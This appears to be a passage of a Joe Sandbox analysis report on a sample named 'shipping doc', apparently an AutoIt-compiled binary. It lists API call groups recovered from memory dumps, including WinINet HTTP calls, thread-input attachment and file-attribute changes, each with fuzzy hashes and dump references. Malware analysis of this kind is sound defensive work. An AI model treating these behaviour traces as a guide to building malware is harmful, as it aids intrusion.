                                                                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00173C13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 312131281-0
                                                                                              • Opcode ID: ff0da41232f451f42485747ccc8c57e40bce25e842332fe7e89d748e00160a13
                                                                                              • Instruction ID: b89826e5624f4f9e6b77cb745b56b1d7b565072ecb32628c6625e860798e3cd7
                                                                                              • Opcode Fuzzy Hash: ff0da41232f451f42485747ccc8c57e40bce25e842332fe7e89d748e00160a13
                                                                                              • Instruction Fuzzy Hash: A7616D75900248AFDB11DF68CC81EEE77F8EB09704F10419AFA19A7291D770AE85DF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0014B151
                                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0014A1E1,?,00000001), ref: 0014B165
                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 0014B16C
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0014A1E1,?,00000001), ref: 0014B17B
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0014B18D
                                                                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0014A1E1,?,00000001), ref: 0014B1A6
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0014A1E1,?,00000001), ref: 0014B1B8
                                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0014A1E1,?,00000001), ref: 0014B1FD
                                                                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0014A1E1,?,00000001), ref: 0014B212
                                                                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0014A1E1,?,00000001), ref: 0014B21D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                              • String ID:
                                                                                              • API String ID: 2156557900-0
                                                                                              • Opcode ID: 8c88bc585fd09bf5518150b7e1fc19b980d99f42b4b38878eb5bb22ba1a99209
                                                                                              • Instruction ID: 8473b44da3d04cfe36d08c038f27ffae430724961a0331b5efdad480fdd46225
                                                                                              • Opcode Fuzzy Hash: 8c88bc585fd09bf5518150b7e1fc19b980d99f42b4b38878eb5bb22ba1a99209
                                                                                              • Instruction Fuzzy Hash: 6F318975544208AFDB10AF24EC88F6EBBB9BF59311F104119FA15D66A0D7B4EA808FA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00112C94
                                                                                                • Part of subcall function 001129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0011D7D1,00000000,00000000,00000000,00000000,?,0011D7F8,00000000,00000007,00000000,?,0011DBF5,00000000), ref: 001129DE
                                                                                                • Part of subcall function 001129C8: GetLastError.KERNEL32(00000000,?,0011D7D1,00000000,00000000,00000000,00000000,?,0011D7F8,00000000,00000007,00000000,?,0011DBF5,00000000,00000000), ref: 001129F0
                                                                                              • _free.LIBCMT ref: 00112CA0
                                                                                              • _free.LIBCMT ref: 00112CAB
                                                                                              • _free.LIBCMT ref: 00112CB6
                                                                                              • _free.LIBCMT ref: 00112CC1
                                                                                              • _free.LIBCMT ref: 00112CCC
                                                                                              • _free.LIBCMT ref: 00112CD7
                                                                                              • _free.LIBCMT ref: 00112CE2
                                                                                              • _free.LIBCMT ref: 00112CED
                                                                                              • _free.LIBCMT ref: 00112CFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 214ec15df1dc351e7f4d85b72b5a5c7f2c6e5fb92b2d39787ca943bf43509b50
                                                                                              • Instruction ID: a122f5a1d26bdf9db5350b0c1caefe273a4ac53dd856cb42b2876aa68447b68f
                                                                                              • Opcode Fuzzy Hash: 214ec15df1dc351e7f4d85b72b5a5c7f2c6e5fb92b2d39787ca943bf43509b50
                                                                                              • Instruction Fuzzy Hash: 1C119676100118AFCB0AEF58D942CDD3BA5FF15364F4144A5FA485F222D731EAA09B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000E1459
                                                                                              • OleUninitialize.OLE32(?,00000000), ref: 000E14F8
                                                                                              • UnregisterHotKey.USER32(?), ref: 000E16DD
                                                                                              • DestroyWindow.USER32(?), ref: 001224B9
                                                                                              • FreeLibrary.KERNEL32(?), ref: 0012251E
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0012254B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                              • String ID: close all
                                                                                              • API String ID: 469580280-3243417748
                                                                                              • Opcode ID: 5b50c6342e34de1dc8b3eadbf5f8a213fa8e323c0da3b048d7e78b35351b7aad
                                                                                              • Instruction ID: d1ecd8a5adfe79716269974527f2c490cdad44094131d0a307b5944c74562663
                                                                                              • Opcode Fuzzy Hash: 5b50c6342e34de1dc8b3eadbf5f8a213fa8e323c0da3b048d7e78b35351b7aad
                                                                                              • Instruction Fuzzy Hash: DBD17E31701262DFCB29EF15D595AADF7A0BF05700F1481ADE94A7B262DB30AD62CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00157FAD
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00157FC1
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00157FEB
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00158005
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00158017
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00158060
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001580B0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$AttributesFile
                                                                                              • String ID: *.*
                                                                                              • API String ID: 769691225-438819550
                                                                                              • Opcode ID: e68a5df6a45b3a7fb725870dc6905d2d7d4c7738c0f636a229a043d02c8a7438
                                                                                              • Instruction ID: 9323abf093f741948b22404b9ca83b50401e84dd3695629d5125cf57dfc6699e
                                                                                              • Opcode Fuzzy Hash: e68a5df6a45b3a7fb725870dc6905d2d7d4c7738c0f636a229a043d02c8a7438
                                                                                              • Instruction Fuzzy Hash: 5581AE72508341DFCB24EE14D8429AAB3E8EB84311F144C6EFCA9DB291DB34DD498B92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 000E5C7A
                                                                                                • Part of subcall function 000E5D0A: GetClientRect.USER32(?,?), ref: 000E5D30
                                                                                                • Part of subcall function 000E5D0A: GetWindowRect.USER32(?,?), ref: 000E5D71
                                                                                                • Part of subcall function 000E5D0A: ScreenToClient.USER32(?,?), ref: 000E5D99
                                                                                              • GetDC.USER32 ref: 001246F5
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00124708
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00124716
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0012472B
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00124733
                                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001247C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                              • String ID: U
                                                                                              • API String ID: 4009187628-3372436214
                                                                                              • Opcode ID: 2bc99f4d2ba29f18614b668210c2fca67c80ee8881ad40927c15ab16432b7e3e
                                                                                              • Instruction ID: c188ca13fcfe638c9f7f1207152a2a8592b44f948609980f164811845eca0e13
                                                                                              • Opcode Fuzzy Hash: 2bc99f4d2ba29f18614b668210c2fca67c80ee8881ad40927c15ab16432b7e3e
                                                                                              • Instruction Fuzzy Hash: BE711F30500205EFCF25CF64DD84AFA3BB2FF4A325F244269ED656A2A6C33188A1DF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001535E4
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                              • LoadStringW.USER32(001B2390,?,00000FFF,?), ref: 0015360A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString$_wcslen
                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                              • API String ID: 4099089115-2391861430
                                                                                              • Opcode ID: 3715d1965b5784607dd2a1f9cceec43aaa7d4b415adfee82a395785ad57ec345
                                                                                              • Instruction ID: 113eab01453c3fe8287584dc9d335687d71127317f23ca4f62f0967a4c8939b8
                                                                                              • Opcode Fuzzy Hash: 3715d1965b5784607dd2a1f9cceec43aaa7d4b415adfee82a395785ad57ec345
                                                                                              • Instruction Fuzzy Hash: FB51697180024ABEDF15EBA1DC42EEEBB78AF14341F544129F515731A2EB312B99DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0015C272
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0015C29A
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0015C2CA
                                                                                              • GetLastError.KERNEL32 ref: 0015C322
                                                                                              • SetEvent.KERNEL32(?), ref: 0015C336
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0015C341
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                              • String ID:
                                                                                              • API String ID: 3113390036-3916222277
                                                                                              • Opcode ID: 35041a059850022669e4d28a699767fa123400ed981791b726ff1a950f74c512
                                                                                              • Instruction ID: 611f02c3ba91b3762d7d06cfcdbcf8affd604d2c487a127202c8ee7a9bb8d3c5
                                                                                              • Opcode Fuzzy Hash: 35041a059850022669e4d28a699767fa123400ed981791b726ff1a950f74c512
                                                                                              • Instruction Fuzzy Hash: 39316F71500308EFD7619F64CC88AAB7AFCFB59745F10851DF8569A611DB30DD889BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00123AAF,?,?,Bad directive syntax error,0017CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 001498BC
                                                                                              • LoadStringW.USER32(00000000,?,00123AAF,?), ref: 001498C3
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00149987
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadMessageModuleString_wcslen
                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                              • API String ID: 858772685-4153970271
                                                                                              • Opcode ID: c9cfd631e9fbb5bfc0f56ae1a09082c61d76516ef443409a740d089ef9888330
                                                                                              • Instruction ID: 249d1469ef42eb0a52bef50b424dc1e992fed716026dd2f1e56bf246468061c3
                                                                                              • Opcode Fuzzy Hash: c9cfd631e9fbb5bfc0f56ae1a09082c61d76516ef443409a740d089ef9888330
                                                                                              • Instruction Fuzzy Hash: C4216D3190025AAFCF15AFA0CC0AEEE7B75FF19304F044469F519760A2EB719A58DB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetParent.USER32 ref: 001420AB
                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 001420C0
                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0014214D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameParentSend
                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                              • API String ID: 1290815626-3381328864
                                                                                              • Opcode ID: b7066b5d74062de8d60a8b50837ca36260ed2871b80bfe138832c25b069dc630
                                                                                              • Instruction ID: cd3045fc8ee5feea20d5a9fa623a65d88bc2c3b26767485470894781c520a6e1
                                                                                              • Opcode Fuzzy Hash: b7066b5d74062de8d60a8b50837ca36260ed2871b80bfe138832c25b069dc630
                                                                                              • Instruction Fuzzy Hash: 4A1106BA6C8706FAF7052224DC06DE7379DCB15B25B61002AFB05A50F2EBB568C15664
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                              • String ID:
                                                                                              • API String ID: 1282221369-0
                                                                                              • Opcode ID: 1955132540474a862f860d3ecdf52e80f64e367d74ffac51915ccf0ffdebb888
                                                                                              • Instruction ID: bd2f661946df5bc50a992f3335fc1d8b5a4889b9e673efeb71e2cfb12aba3371
                                                                                              • Opcode Fuzzy Hash: 1955132540474a862f860d3ecdf52e80f64e367d74ffac51915ccf0ffdebb888
                                                                                              • Instruction Fuzzy Hash: 6A613471A44316AFDB2DAFF4A881AEA7BA5AF19320F04427DF94497281D7319DC2C7D0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00175186
                                                                                              • ShowWindow.USER32(?,00000000), ref: 001751C7
                                                                                              • ShowWindow.USER32(?,00000005,?,00000000), ref: 001751CD
                                                                                              • SetFocus.USER32(?,?,00000005,?,00000000), ref: 001751D1
                                                                                                • Part of subcall function 00176FBA: DeleteObject.GDI32(00000000), ref: 00176FE6
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0017520D
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0017521A
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0017524D
                                                                                              • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00175287
                                                                                              • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00175296
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                              • String ID:
                                                                                              • API String ID: 3210457359-0
                                                                                              • Opcode ID: 51dac8acc236791c31b32be27f95d816168fcf1606e1de9c28899dff83c122af
                                                                                              • Instruction ID: c71be65d28d02788f214b7c37d6b9e5d1d8f6cdf4118b3c982be7d9ecdc21583
                                                                                              • Opcode Fuzzy Hash: 51dac8acc236791c31b32be27f95d816168fcf1606e1de9c28899dff83c122af
                                                                                              • Instruction Fuzzy Hash: CA518230A44A08FEEF249F24CC45BD93B77EB05366F64C115F61D962E2C7B5A990DB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00136890
                                                                                              • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001368A9
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001368B9
                                                                                              • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001368D1
                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001368F2
                                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000F8874,00000000,00000000,00000000,000000FF,00000000), ref: 00136901
                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0013691E
                                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000F8874,00000000,00000000,00000000,000000FF,00000000), ref: 0013692D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 1268354404-0
                                                                                              • Opcode ID: 7420f0d4751c4871478db9cb27eacd1367dc559f5c1c52ee1cfe9d1449d02358
                                                                                              • Instruction ID: 3fa20ef07c2f612d3ac01906f0df05848910b750cf7c2beb4469bdc6c1bd94ff
                                                                                              • Opcode Fuzzy Hash: 7420f0d4751c4871478db9cb27eacd1367dc559f5c1c52ee1cfe9d1449d02358
                                                                                              • Instruction Fuzzy Hash: 80516770600209FFDB20CF25CC95BAA7BB5FB58754F108518FA1696AA0DB71E990EB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0015C182
                                                                                              • GetLastError.KERNEL32 ref: 0015C195
                                                                                              • SetEvent.KERNEL32(?), ref: 0015C1A9
                                                                                                • Part of subcall function 0015C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0015C272
                                                                                                • Part of subcall function 0015C253: GetLastError.KERNEL32 ref: 0015C322
                                                                                                • Part of subcall function 0015C253: SetEvent.KERNEL32(?), ref: 0015C336
                                                                                                • Part of subcall function 0015C253: InternetCloseHandle.WININET(00000000), ref: 0015C341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 337547030-0
